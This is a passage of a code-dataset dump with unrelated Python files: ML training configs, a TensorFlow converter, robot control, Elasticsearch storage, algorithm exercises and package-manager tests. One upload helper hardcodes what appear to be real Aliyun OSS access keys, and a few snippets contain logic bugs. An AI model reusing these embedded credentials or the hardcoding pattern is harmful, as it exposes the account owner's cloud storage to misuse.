\"oqmd_3d_no_cfid\":\n config[\"id_tag\"] = \"_oqmd_entry_id\"\n config[\"num_workers\"] = 0\n if dataset == \"edos_pdos\":\n if prop == \"edos_up\":\n config[\"model\"][\"output_features\"] = 300\n elif prop == \"pdos_elast\":\n config[\"model\"][\"output_features\"] = 200\n else:\n raise ValueError(\"Target not available.\")\n if dataset == \"qm9_std_jctc\":\n config[\"id_tag\"] = \"id\"\n config[\"n_train\"] = 110000\n config[\"n_val\"] = 10000\n config[\"n_test\"] = 10829\n\n # config[\"batch_size\"] = 64\n config[\"cutoff\"] = 5.0\n config[\"standard_scalar_and_pca\"] = False\n\n if dataset == \"qm9_dgl\":\n config[\"id_tag\"] = \"id\"\n config[\"n_train\"] = 110000\n config[\"n_val\"] = 10000\n config[\"n_test\"] = 10831\n config[\"standard_scalar_and_pca\"] = False\n config[\"batch_size\"] = 64\n config[\"cutoff\"] = 5.0\n if config[\"target\"] == \"all\":\n config[\"model\"][\"output_features\"] = 12\n\n # config[\"max_neighbors\"] = 9\n\n if dataset == \"hpov\":\n config[\"id_tag\"] = \"id\"\n if dataset == \"qm9\":\n config[\"id_tag\"] = \"id\"\n config[\"n_train\"] = 110000\n config[\"n_val\"] = 10000\n config[\"n_test\"] = 13885\n config[\"batch_size\"] = batch_size\n config[\"cutoff\"] = 5.0\n config[\"max_neighbors\"] = 9\n # config['atom_features']='atomic_number'\n if prop in [\"homo\", \"lumo\", \"gap\", \"zpve\", \"U0\", \"U\", \"H\", \"G\"]:\n config[\"target_multiplication_factor\"] = 27.211386024367243\n t1 = time.time()\n result = train_dgl(config)\n t2 = time.time()\n print(\"train=\", result[\"train\"])\n print(\"validation=\", result[\"validation\"])\n print(\"Toal time:\", t2 - t1)\n print()\n print()\n print()\n","sub_path":"alignn/train_props.py","file_name":"train_props.py","file_ext":"py","file_size_in_byte":4390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"503461497","text":"\nimport tensorflow as tf\nfrom google.protobuf import text_format\nfrom tensorflow.python.platform import gfile\n\ndef pbtxt_to_graphdef(filename):\n with open(filename, 'r') as f:\n graph_def = tf.GraphDef()\n file_content = f.read()\n text_format.Merge(file_content, graph_def)\n tf.import_graph_def(graph_def, name='')\n 
tf.train.write_graph(graph_def, 'pbtxt/', 'protobuf.pb', as_text=False)\n\ndef graphdef_to_pbtxt(filename): \n with gfile.FastGFile(filename,'rb') as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n tf.import_graph_def(graph_def, name='')\n tf.train.write_graph(graph_def, 'pbtxt/', 'protobuf.pbtxt', as_text=True)\n return\n\n #===================================================\nfrom tensorflow.core.protobuf import saved_model_pb2\nfrom tensorflow.python.util import compat\n\ndef graphdef_to_pbtxt22(filename): \n with tf.Session() as sess:\n with gfile.FastGFile(filename,'rb') as f:\n data = compat.as_bytes(f.read())\n sm = saved_model_pb2.SavedModel()\n sm.ParseFromString(data) \n g_in = tf.import_graph_def(sm.meta_graphs[0].graph_def) \n tf.train.write_graph(sess.graph, 'pbtxt/', 'protobuf.pbtxt', as_text=True)\n return\n \n \n# graphdef_to_pbtxt22('saved_model.pb') # here you can write the name of the file to be converted\n# and then a new file will be made in pbtxt directory.\n\ngraphdef_to_pbtxt(\"models/Frozen_model_ssd_train3_10000_step/frozen_inference_graph.pb\")","sub_path":"models/udsim/converter_pb_pbtxt.py","file_name":"converter_pb_pbtxt.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"462108722","text":"#!/usr/bin/env python3\n\n#######################################################################################\n# #\n# Program purpose: Removes duplicates element (leaving just a two) using #\n# O(1) memory algorithm. #\n# Program Author : Happi Yvan #\n# Creation Date : September 14, 2020 #\n# #\n#######################################################################################\n\nfrom typing import List\n\ndef remove_duplicates(sorted_array: List[int]) -> None:\n for val in sorted_array:\n while sorted_array.count(val) >= 3:\n sorted_array.remove(val)\n\nif __name__ == \"__main__\":\n main_test = [1, 1, 1, 2, 3, 4, 5, 4, 6, 6, 9]\n print(\"[BEFORE]:\", main_test)\n\n remove_duplicates(sorted_array=main_test)\n\n print(\"[AFTER]:\", main_test)\n","sub_path":"online-workouts/leet-code/easy/remove-duplicates-from-sorted-array-2.py","file_name":"remove-duplicates-from-sorted-array-2.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"394148357","text":"\n\"\"\"\nAuthor: Patrick Addis\n\"\"\"\n\nimport mqtt_remote_method_calls as com\nimport robot_controller as robo\n\nimport ev3dev.ev3 as ev3\nimport time\n\n\n# mqtt_client.connect_to_pc(\"35.194.247.175\") # Off campus IP address of a GCP broker\n\n\nCOLOR_NAMES = [\"None\", \"Black\", \"Blue\", \"Green\", \"Yellow\", \"Red\", \"White\", \"Brown\"]\n\n\nclass DataContainer(object):\n\n def __init__(self):\n self.running = True\n\n\ndc = DataContainer()\n\n\ndef on_down(robot, mqtt_client):\n print(robot.is_running())\n while robot.is_running():\n drive_to_color(robot, ev3.ColorSensor.COLOR_BLUE, mqtt_client)\n\n\ndef main():\n robot = robo.Snatch3r()\n mqtt_client = com.MqttClient(robot)\n mqtt_client.connect_to_pc()\n ev3.Sound.speak(\"Drive to the color\").wait()\n print(\"Press Back to exit this program.\")\n\n btn = ev3.Button()\n btn.on_backspace = lambda state: handle_shutdown(state, dc)\n\n while dc.running:\n btn.process()\n time.sleep(0.01)\n on_down(robot, mqtt_client)\n\n print(\"Goodbye!\")\n ev3.Sound.speak(\"Goodbye\").wait()\n\n\n# 
----------------------------------------------------------------------\n# Event handlers\n# ----------------------------------------------------------------------\ndef drive_to_color(robot, color_to_seek, mqtt_client):\n \"\"\"\n When the button_state is True (pressed), drives the robot forward until the desired color is detected.\n When the color_to_seek is detected the robot stops moving forward and speaks a message.\n\n Type hints:\n :type button_state: bool\n :type robot: robo.Snatch3r\n :type color_to_seek: int\n \"\"\"\n ev3.Sound.speak(\"Seeking \" + COLOR_NAMES[color_to_seek]).wait()\n while robot.is_running():\n if color_to_seek != robot.color_sensor.color:\n print('Not Found')\n else:\n robot.drive_inches(-6, 500)\n mqtt_client.send_message(\"pc_window\", [])\n break\n robot.stop()\n\n ev3.Sound.speak(\"Found \" + COLOR_NAMES[color_to_seek]).wait()\n\n\ndef handle_shutdown(button_state, dc):\n \"\"\"Exit the program.\"\"\"\n if button_state:\n dc.running = False\n\n\n# ----------------------------------------------------------------------\n# Calls main to start the ball rolling.\n# ----------------------------------------------------------------------\nmain()\n","sub_path":"projects/addispz/Actual Code_ev3.py","file_name":"Actual Code_ev3.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"206807931","text":"import opf\r\nimport pandas as pd\r\n\r\n# Import generation and load profiles\r\nPdDF = pd.read_excel('Data.xlsx', sheet_name='Pd', index_col=0)\r\nQdDF = pd.read_excel('Data.xlsx', sheet_name='Qd', index_col=0)\r\nPpvDF = pd.read_excel('Data.xlsx', sheet_name='Ppv', index_col=0)\r\nQpvDF = pd.read_excel('Data.xlsx', sheet_name='Qpv', index_col=0)\r\nPwtDF = pd.read_excel('Data.xlsx', sheet_name='Pwt', index_col=0)\r\nQwtDF = pd.read_excel('Data.xlsx', sheet_name='Qwt', index_col=0)\r\nPG2DF = pd.read_excel('Data.xlsx', sheet_name='PG2', index_col=0)\r\nQG2DF = pd.read_excel('Data.xlsx', sheet_name='QG2', index_col=0)\r\nPC1DF = pd.read_excel('Data.xlsx', sheet_name='PC1', index_col=0)\r\nQC1DF = pd.read_excel('Data.xlsx', sheet_name='QC1', index_col=0)\r\n\r\nPdDict = { (t,c) : PdDF.to_dict('index')[t][c] for t in PdDF.index for c in PdDF.columns }\r\nQdDict = { (t,c) : QdDF.to_dict('index')[t][c] for t in QdDF.index for c in QdDF.columns }\r\nPpvDict = { (t,c) : PpvDF.to_dict('index')[t][c] for t in PpvDF.index for c in PpvDF.columns }\r\nQpvDict = { (t,c) : QpvDF.to_dict('index')[t][c] for t in QpvDF.index for c in QpvDF.columns }\r\nPwtDict = { (t,c) : PwtDF.to_dict('index')[t][c] for t in PwtDF.index for c in PwtDF.columns }\r\nQwtDict = { (t,c) : QwtDF.to_dict('index')[t][c] for t in QwtDF.index for c in QwtDF.columns }\r\nPG2Dict = { (t,c) : PG2DF.to_dict('index')[t][c] for t in PG2DF.index for c in PG2DF.columns }\r\nQG2Dict = { (t,c) : QG2DF.to_dict('index')[t][c] for t in QG2DF.index for c in QG2DF.columns }\r\nPC1Dict = { (t,c) : PC1DF.to_dict('index')[t][c] for t in PC1DF.index for c in PC1DF.columns }\r\nQC1Dict = { (t,c) : QC1DF.to_dict('index')[t][c] for t in QC1DF.index for c in QC1DF.columns }\r\n\r\n# Solve OPF\r\nopf.opf(PdDict, QdDict, PpvDict, QpvDict, PwtDict, QwtDict, PG2Dict, QG2Dict, PC1Dict, QC1Dict)","sub_path":"OPF_Original - 11_07_19/myRun.py","file_name":"myRun.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"238158776","text":"# -*- coding: utf-8 
-*-\nimport base64\nimport os\nimport oss2\n\n# First, set up the AccessKeyId, AccessKeySecret, Endpoint and related settings.\n# They are read from environment variables; alternatively, replace placeholders such as <your AccessKeyId> with the real values.\naccess_key_id = os.getenv('OSS_TEST_ACCESS_KEY_ID', 'LTAI4FkXV5WzzQiVx6Jj8Lna')\naccess_key_secret = os.getenv('OSS_TEST_ACCESS_KEY_SECRET', '2iw8aulSCNJovwpLIMQ8VM8JUk8Uci')\nbucket_name = os.getenv('OSS_TEST_BUCKET', 'ynd-picture')\nendpoint = os.getenv('OSS_TEST_ENDPOINT', 'oss-cn-beijing.aliyuncs.com')\n\n# Make sure the parameters above are all filled in correctly\nfor param in (access_key_id, access_key_secret, bucket_name, endpoint):\n    assert '<' not in param, 'please set the parameter: ' + param\n\n# Create the Bucket object; all Object-related operations go through it\nbucket = oss2.Bucket(oss2.Auth(access_key_id, access_key_secret), endpoint, bucket_name)\n\n\ndef goodfile_upload(goodname, file, num):\n    if file is None:\n        return 'no file found'\n    else:\n        # Upload the file to Aliyun OSS\n        goodimg = bucket.put_object(goodname + str(num) + \".jpg\", file)\n        if goodimg.status == 200:\n            # Upload succeeded: build the file URL and return it to the frontend\n            url = \"https://ynd-picture.oss-cn-beijing.aliyuncs.com/\" + goodname + str(num) + '.jpg'\n            # return the path of the user avatar\n            return url\n        else:\n            return \"upload failed, please upload again\"\n\n\n# Update: replace image number num with a new one\ndef changefile_upload(goodname, num, img):\n    bucket.delete_object(goodname + num + '.jpg')\n    goodimg = base64.b64decode(img)\n    # The first argument is the stored object name, the second is the uploaded image\n    res = bucket.put_object(goodname + '.jpg', goodimg)\n    if res.status == 200:\n        url = \"https://ynd-picture.oss-cn-beijing.aliyuncs.com/\" + goodname + str(num) + '.jpg'\n        # return the path of the user avatar\n        return \"update succeeded!\"\n    else:\n        return \"upload failed, please upload again\"\n\n\n# Delete the user avatar; username = the logged-in user name\ndef delete_goodimg(username):\n    bucket.delete_object(username + '.jpg')\n# User uploads an avatar; username = the logged-in user name, img is a base64-encoded string\n","sub_path":"seller_goods/oss_file_upload/img_upload.py","file_name":"img_upload.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"298167582","text":"import numpy as np \r\nimport matplotlib.pyplot as plt \r\n# How array arguments to scatter work: s is an array the same size as x, giving one marker size for each point in x\r\nX_list=[1,2,3,4,5,6]\r\nY_list=[2.5,3.51,4.45,5.52,6.47,7.51]\r\n\r\nx=np.arange(1,10)\r\nprint(x)\r\ny=x \r\nprint(type(x))\r\nprint(type(y))\r\nfig=plt.figure()\r\nax1=fig.add_subplot(111)\r\n# set the title\r\nax1.set_title(\"Scatter Plot\")\r\n# set the x-axis label\r\nplt.xlabel(\"X\")\r\n# set the y-axis label\r\nplt.ylabel(\"Y\")\r\n# draw the scatter plot\r\nsValue=40*x\r\ncValue=['r','y','g','b','r','b','g','g','b']\r\nIValue=x\r\n#ax1.scatter(x,y,s=100,linewidths=IValue,marker='o')  # linewidths controls the width of the marker edges\r\n#ax1.scatter(x,y,c='r',marker='o')\r\n#ax1.scatter(x,y,c='r',marker='o')\r\n#ax1.scatter(x,y,s=sValue,c='r',marker='x')  # s controls the marker sizes\r\n# plain lists can be plotted as well; s must have the same length as X_list\r\nax1.scatter(X_list,Y_list,s=sValue[:len(X_list)],c='r',marker='x')  # s controls the marker sizes\r\n\r\n#ax1.scatter(x,y,c=cValue,marker='s')\r\n# set the legend\r\nplt.legend(\"x1\")\r\n# show the figure\r\nplt.show()","sub_path":"python/matplotlib/scatter.py","file_name":"scatter.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"425501752","text":"#!/usr/bin/env python3\n\nimport sys\n\ndef main(args):\n    print(\"Hello world!\")\n\n    pos=(0,0)\n\n    x=0\n\n    up=(0,1)\n    down=(0,-1)\n    left=(1,0)\n    right=(-1,0)\n    dir=[up,left,down,right]\n\n    for i in args[1]:\n        if (i=='L'):\n            x+=1\n        elif (i=='R'):\n            x-=1\n        if (x==4):\n            x=0\n        if (x==-1):\n            x=3\n\n        if (i!='O' and i!='L' and i!='R'):\n            # step one unit in the current direction\n            pos = (pos[0] + dir[x][0], pos[1] + dir[x][1])\n\n\n    return 0\n\nif __name__ == \"__main__\":\n    
main(sys.argv)\n","sub_path":"pathfix.py","file_name":"pathfix.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"5287720","text":"from functools import lru_cache\nfrom typing import Dict, Iterable, Optional\n\nfrom elasticsearch import AsyncElasticsearch, NotFoundError\nfrom fastapi import Depends\n\nfrom db.base import DEFAULT_LIMIT, AbstractDBStorage\n\nes: AsyncElasticsearch = None\n\n# Функция понадобится при внедрении зависимостей\nasync def get_elastic() -> AsyncElasticsearch:\n return es\n\n\nclass ElasticStorage(AbstractDBStorage):\n def __init__(self, elastic: AsyncElasticsearch, index_name: str):\n self.elastic = elastic\n self.index_name = index_name\n\n async def get(self, id: str) -> Optional[Dict]:\n try:\n doc = await self.elastic.get(index=self.index_name, id=id)\n except NotFoundError:\n return None\n\n return doc[\"_source\"]\n\n async def filter(\n self,\n filter_map: Optional[dict] = None,\n search_map: Optional[dict] = None,\n order_map: Optional[dict] = None,\n offset: int = 0,\n limit: int = DEFAULT_LIMIT,\n **kwargs,\n ) -> Iterable[Dict]:\n filter_map = filter_map or {}\n search_map = search_map or {}\n order_map = order_map or {}\n\n body = {}\n if filter_map or search_map:\n body[\"query\"] = self.get_query(filter_map, search_map)\n\n docs = await self.elastic.search(\n index=self.index_name,\n sort=[f\"{field}:{direction}\" for field, direction in order_map.items()],\n from_=offset,\n size=limit,\n body=body,\n )\n return [doc[\"_source\"] for doc in docs[\"hits\"][\"hits\"]]\n\n def get_query(self, filter_map: Dict, search_map: Dict) -> Dict:\n query = {}\n\n if search_map:\n field, match_obj = list(search_map.items())[0]\n query[\"match\"] = {field: match_obj}\n\n return query\n\n\nclass ElasticFilmStorage(ElasticStorage):\n def get_query(self, filter_map: Dict, search_map: Dict) -> Dict:\n query = super().get_query(filter_map, search_map)\n\n if \"genre_id\" in filter_map:\n query[\"nested\"] = {\n \"path\": \"genres\",\n \"query\": {\"term\": {\"genres.id\": str(filter_map[\"genre_id\"])}},\n }\n\n for role in [\"actor\", \"director\", \"writer\"]:\n key = f\"{role}_id\"\n if key in filter_map:\n path = f\"{role}s\"\n query[\"nested\"] = {\n \"path\": path,\n \"query\": {\"term\": {f\"{path}.id\": str(filter_map[key])}},\n }\n\n return query\n\n\n@lru_cache()\ndef get_genre_storage(elastic: AsyncElasticsearch = Depends(get_elastic)) -> ElasticStorage:\n return ElasticStorage(elastic=elastic, index_name=\"genres\")\n\n\n@lru_cache()\ndef get_film_storage(elastic: AsyncElasticsearch = Depends(get_elastic)) -> ElasticFilmStorage:\n return ElasticFilmStorage(elastic=elastic, index_name=\"movies\")\n\n\n@lru_cache()\ndef get_person_storage(elastic: AsyncElasticsearch = Depends(get_elastic)) -> ElasticStorage:\n return ElasticStorage(elastic=elastic, index_name=\"persons\")\n","sub_path":"app/db/elastic.py","file_name":"elastic.py","file_ext":"py","file_size_in_byte":3095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"613411995","text":"coordx = eval(input(\"Give the coordinate x: \"))\ncoordy = eval(input(\"Give the coordinate y: \"))\ncoord=[]\ncoord.append(coordx)\ncoord.append(coordy)\ncoord = tuple(coord)\ncolumn = [\" \",\" \",\" \",\" \",\"|\",\" \",\" \",\" \",\" \"]\nrow = [\"—\",\"—\",\"—\",\"—\",\" \",\"—\",\"—\",\"—\",\"—\"]\ncolumnwritten=[\" \",\" \",\" \",\" \",\"|\",\" \",\" \",\" \",\" \"]\nif 
coord[1] != 0:\n\tcolumnwritten[coord[0]+4]=\"*\"\nelse:\n\trow[coord[0]+4]=\"*\"\ncounter=0\nwhile counter < 9:\n\tif counter-4 == -coord[1]:\n\t\tn=0\n\t\tif coord[1] != 0:\n\t\t\twhile n<9:\n\t\t\t\tprint(columnwritten[n],end=\" \")\n\t\t\t\tn+=1\n\t\telse:\n\t\t\twhile n<9:\n\t\t\t\tprint(row[n],end=\" \")\n\t\t\t\tn+=1\n\t\tprint(\"\\n\")\n\telif counter<4:\n\t\tn=0\n\t\twhile n<9:\n\t\t\tprint(column[n],end=\" \")\n\t\t\tn+=1\n\t\tprint(\"\\n\")\t\n\telif counter>4:\n\t\tn=0\n\t\twhile n<9:\n\t\t\tprint(column[n],end=\" \")\n\t\t\tn+=1\n\t\tprint(\"\\n\")\n\telse:\n\t\tn=0\n\t\twhile n<9:\n\t\t\tprint(row[n],end=\" \")\n\t\t\tn+=1\n\t\tprint(\"\\n\")\n\tcounter+=1\nif coord[0]==0 and coord[1]==0:\n\tprint(\"it is the origin of the coordinate system\")\nelif coord[0]>0 and coord[1]>0:\n\tprint(\"it is on the first zone\")\nelif coord[0] <0 and coord[1]>0:\n\tprint(\"it is on the second zone\")\nelif coord[0] <0 and coord[1]<0:\n\tprint(\"it is on the third zone\")\nelif coord[0] >0 and coord[1] <0:\n\tprint(\"it is on the fourth zone\")\nelif coord[0] == 0 and coord[1]>0:\n\tprint(\"it is on the positive y-axis\")\nelif coord[0] == 0 and coord[1]<0:\n\tprint(\"it is on the negative y-axis\")\nelif coord[0]>0 and coord[1] == 0:\n\tprint(\"it is on the positive x-axis\")\nelif coord[0]<0 and coord[1] == 0:\n\tprint(\"it is on the negative x-axis\")\n","sub_path":"coordinateSystem.py","file_name":"coordinateSystem.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"288135649","text":"class Solution:\n    def exist(self, board, word):\n        if len(word)==0:\n            return False\n        list=self.find(board,word[0])\n        for l in list:\n            mark = [[True for t in temp] for temp in board]\n            r=self.search(board, word, mark,l[0],l[1])\n            if r==True:\n                return True\n        return False\n    def search(self,board,word,mark,i,j):\n        if len(word)==0:\n            return True\n        if i<0 or i>=len(board) or j<0 or j>=len(board[0]):\n            return False\n        if mark[i][j] and board[i][j]==word[0]:\n            mark[i][j]=False\n            down=self.search(board,word[1:],mark,i+1,j)\n            if down :\n                return down\n            up = self.search(board,word[1:], mark, i - 1, j)\n            if up :\n                return up\n            right = self.search(board,word[1:], mark, i , j+1)\n            if right:\n                return right\n            left = self.search(board,word[1:], mark, i , j-1)\n            mark[i][j] = True\n            return left\n        else:\n            return False\n\n    def find(self,board,s):\n        list=[]\n        for i,temp in enumerate(board):\n            for j,t in enumerate(temp):\n                if t==s:\n                    list.append([i,j])\n        return list\n\ns=Solution()\n\ntest=[\n{\"input\":[[[\"A\",\"B\",\"C\",\"E\"],[\"S\",\"F\",\"E\",\"S\"],[\"A\",\"D\",\"E\",\"E\"]],\"ABCESEEEFS\"],\"output\":True},\n{\"input\":[[[\"C\",\"A\",\"A\"],[\"A\",\"A\",\"A\"],[\"B\",\"C\",\"D\"]],\"AAB\"],\"output\":True},\n{\"input\":[[\n    ['A','B','C','E'],\n    ['S','F','C','S'],\n    ['A','D','E','E']\n],\"ABCCED\"],\"output\":True},\n{\"input\":[[\n    ['A','B','C','E'],\n    ['S','F','C','S'],\n    ['A','D','E','E']\n],\"SEE\"],\"output\":True},\n{\"input\":[[\n    ['A','B','C','E'],\n    ['S','F','C','S'],\n    ['A','D','E','E']\n],\"ABCB\"],\"output\":False},\n\n]\nfor t in test:\n    r=s.exist(t['input'][0],t['input'][1])\n    if r!=t['output']:\n        print(\"error:\"+str(t)+\" out:\"+str(r))\n        r = s.exist(t['input'][0], t['input'][1])","sub_path":"51-100/79. 
单词搜索.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"321581847","text":"from __future__ import absolute_import, print_function\n\nimport datetime\nimport os\nimport shutil\nimport tempfile\nimport textwrap\n\nimport mock\n\nfrom egginst._compat import assertCountEqual\nfrom egginst.tests.common import mkdtemp\nfrom egginst.vendor.six.moves import unittest\n\nfrom enstaller.config import Configuration\nfrom enstaller.tests.common import (FAKE_MD5, FAKE_SIZE, PY_VER,\n FakeOptions,\n create_prefix_with_eggs,\n create_repositories,\n dummy_installed_package_factory,\n dummy_repository_package_factory,\n mock_print)\n\nfrom ..commands import (info_option, install_from_requirements, update_all,\n whats_new)\n\n\nclass TestInfoStrings(unittest.TestCase):\n def test_info_option(self):\n self.maxDiff = None\n\n # Given\n mtime = 0.0\n r_output = textwrap.dedent(\"\"\"\\\n Package: enstaller\n\n Version: 4.6.2-1\n Product: commercial\n Available: True\n Python version: {2}\n Store location: {3}\n Last modified: {4}\n MD5: {0}\n Size: {1}\n Requirements: None\n Version: 4.6.3-1\n Product: commercial\n Available: True\n Python version: {2}\n Store location: {3}\n Last modified: {4}\n MD5: {0}\n Size: {1}\n Requirements: None\n \"\"\".format(FAKE_MD5, FAKE_SIZE, PY_VER, \"\",\n datetime.datetime.fromtimestamp(mtime)))\n\n entries = [dummy_repository_package_factory(\"enstaller\", \"4.6.2\", 1),\n dummy_repository_package_factory(\"enstaller\", \"4.6.3\", 1)]\n\n remote_repository, installed_repository = \\\n create_repositories(remote_entries=entries)\n\n # When\n with mock_print() as m:\n info_option(remote_repository, installed_repository,\n \"enstaller\")\n # Then\n self.assertMultiLineEqual(m.value, r_output)\n\n\nclass TestUpdatesCheck(unittest.TestCase):\n def test_whats_new_no_new_epd(self):\n # Given\n r_output = textwrap.dedent(\"\"\"\\\n Name installed available\n ============================================================\n scipy 0.12.0-1 0.13.0-1\n numpy 1.7.1-1 1.7.1-2\n \"\"\")\n installed_entries = [\n dummy_installed_package_factory(\"numpy\", \"1.7.1\", 1),\n dummy_installed_package_factory(\"scipy\", \"0.12.0\", 1)\n ]\n remote_entries = [\n dummy_repository_package_factory(\"numpy\", \"1.7.1\", 2),\n dummy_repository_package_factory(\"scipy\", \"0.13.0\", 1)\n ]\n\n remote, installed = create_repositories(remote_entries,\n installed_entries)\n\n # When\n with mock_print() as m:\n whats_new(remote, installed)\n\n # Then\n\n # FIXME: we splitlines and compared wo caring about order, as\n # the actual line order depends on dict ordering from\n # EggCollection.query_installed.\n assertCountEqual(self, m.value.splitlines(), r_output.splitlines())\n\n def test_whats_new_new_epd(self):\n # Given\n r_output = \"EPD 7.3-2 is available. 
To update to it (with \" \\\n \"confirmation warning), run 'enpkg epd'.\\n\"\n installed_entries = [\n dummy_installed_package_factory(\"EPD\", \"7.2\", 1),\n ]\n remote_entries = [\n dummy_repository_package_factory(\"EPD\", \"7.3\", 2),\n ]\n\n remote, installed = create_repositories(remote_entries,\n installed_entries)\n\n # When\n with mock_print() as m:\n whats_new(remote, installed)\n\n # Then\n self.assertMultiLineEqual(m.value, r_output)\n\n def test_whats_new_no_updates(self):\n # Given\n r_output = \"No new version of any installed package is available\\n\"\n\n installed_entries = [\n dummy_installed_package_factory(\"numpy\", \"1.7.1\", 2),\n dummy_installed_package_factory(\"scipy\", \"0.13.0\", 1)\n ]\n remote_entries = [\n dummy_repository_package_factory(\"numpy\", \"1.7.1\", 1),\n dummy_repository_package_factory(\"scipy\", \"0.12.0\", 1)\n ]\n\n remote, installed = create_repositories(remote_entries,\n installed_entries)\n\n # When\n with mock_print() as m:\n whats_new(remote, installed)\n\n # Then\n self.assertMultiLineEqual(m.value, r_output)\n\n def test_update_all_no_updates(self):\n r_output = \"No new version of any installed package is available\\n\"\n config = Configuration()\n\n installed_entries = [\n dummy_installed_package_factory(\"numpy\", \"1.7.1\", 2),\n dummy_installed_package_factory(\"scipy\", \"0.13.0\", 1)\n ]\n remote_entries = [\n dummy_repository_package_factory(\"numpy\", \"1.7.1\", 1),\n dummy_repository_package_factory(\"scipy\", \"0.12.0\", 1)\n ]\n\n with mkdtemp() as d:\n enpkg = create_prefix_with_eggs(config, d,\n installed_entries, remote_entries)\n with mock_print() as m:\n update_all(enpkg, config, FakeOptions())\n self.assertMultiLineEqual(m.value, r_output)\n\n def test_update_all_no_epd_updates(self):\n r_output = textwrap.dedent(\"\"\"\\\n The following updates and their dependencies will be installed\n Name installed available\n ============================================================\n scipy 0.13.0-1 0.13.2-1\n \"\"\")\n config = Configuration()\n\n installed_entries = [\n dummy_installed_package_factory(\"numpy\", \"1.7.1\", 2),\n dummy_installed_package_factory(\"scipy\", \"0.13.0\", 1),\n dummy_installed_package_factory(\"epd\", \"7.3\", 1),\n ]\n remote_entries = [\n dummy_repository_package_factory(\"numpy\", \"1.7.1\", 1),\n dummy_repository_package_factory(\"scipy\", \"0.13.2\", 1),\n dummy_repository_package_factory(\"epd\", \"7.3\", 1),\n ]\n\n with mkdtemp() as d:\n enpkg = create_prefix_with_eggs(config, d, installed_entries, remote_entries)\n with mock.patch(\"enstaller.cli.commands.install_req\") as mocked_install_req:\n with mock_print() as m:\n update_all(enpkg, config, FakeOptions())\n self.assertMultiLineEqual(m.value, r_output)\n mocked_install_req.assert_called()\n\n def test_update_all_epd_updates(self):\n r_output = textwrap.dedent(\"\"\"\\\n EPD 7.3-2 is available. 
To update to it (with confirmation warning), run 'enpkg epd'.\n The following updates and their dependencies will be installed\n Name installed available\n ============================================================\n scipy 0.13.0-1 0.13.2-1\n \"\"\")\n config = Configuration()\n\n installed_entries = [\n dummy_installed_package_factory(\"numpy\", \"1.7.1\", 2),\n dummy_installed_package_factory(\"scipy\", \"0.13.0\", 1),\n dummy_installed_package_factory(\"epd\", \"7.3\", 1),\n ]\n remote_entries = [\n dummy_repository_package_factory(\"numpy\", \"1.7.1\", 1),\n dummy_repository_package_factory(\"scipy\", \"0.13.2\", 1),\n dummy_repository_package_factory(\"epd\", \"7.3\", 2),\n ]\n\n with mkdtemp() as d:\n enpkg = create_prefix_with_eggs(config, d, installed_entries, remote_entries)\n with mock.patch(\"enstaller.cli.commands.install_req\") as mocked_install_req:\n with mock_print() as m:\n update_all(enpkg, config, FakeOptions())\n self.assertMultiLineEqual(m.value, r_output)\n mocked_install_req.assert_called()\n\n\nclass TestInstallFromRequirements(unittest.TestCase):\n def setUp(self):\n self.prefix = tempfile.mkdtemp()\n\n def tearDown(self):\n shutil.rmtree(self.prefix)\n\n def test_install_from_requirements(self):\n # Given\n remote_entries = [\n dummy_repository_package_factory(\"numpy\", \"1.8.0\", 1),\n dummy_repository_package_factory(\"numpy\", \"1.8.0\", 2),\n dummy_repository_package_factory(\"nose\", \"1.2.1\", 2),\n dummy_repository_package_factory(\"nose\", \"1.3.0\", 1)\n ]\n\n requirements_file = os.path.join(self.prefix, \"requirements.txt\")\n with open(requirements_file, \"w\") as fp:\n fp.write(\"numpy 1.8.0-1\\nnose 1.2.1-1\")\n\n config = Configuration()\n enpkg = create_prefix_with_eggs(config, self.prefix, [], remote_entries)\n args = FakeOptions()\n args.requirements = requirements_file\n\n # When\n with mock.patch(\"enstaller.cli.commands.install_req\") as mocked_install_req:\n install_from_requirements(enpkg, config, args)\n\n # Then\n mocked_install_req.assert_has_calls(\n [mock.call(enpkg, config, \"numpy 1.8.0-1\", args),\n mock.call(enpkg, config, \"nose 1.2.1-1\", args)])\n","sub_path":"venv/lib/python2.7/site-packages/enstaller/cli/tests/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":9606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"169729778","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport six\n\nfrom reprep import VALID_ID_REGEXP\nfrom contracts import new_contract, contract\nimport re\n\n__all__ = ['valid_id', 'sanitize_id']\n\n@new_contract\ndef valid_id(s):\n assert isinstance(s, six.string_types)\n\n if re.match(VALID_ID_REGEXP, s) is None:\n msg = ('The given string %r does not match the spec %r.' % \n (s, VALID_ID_REGEXP))\n raise ValueError(msg)\n\n@contract(returns='valid_id')\ndef sanitize_id(nid):\n nid = nid.replace('/', '_')\n nid = nid.replace('.', '_')\n return 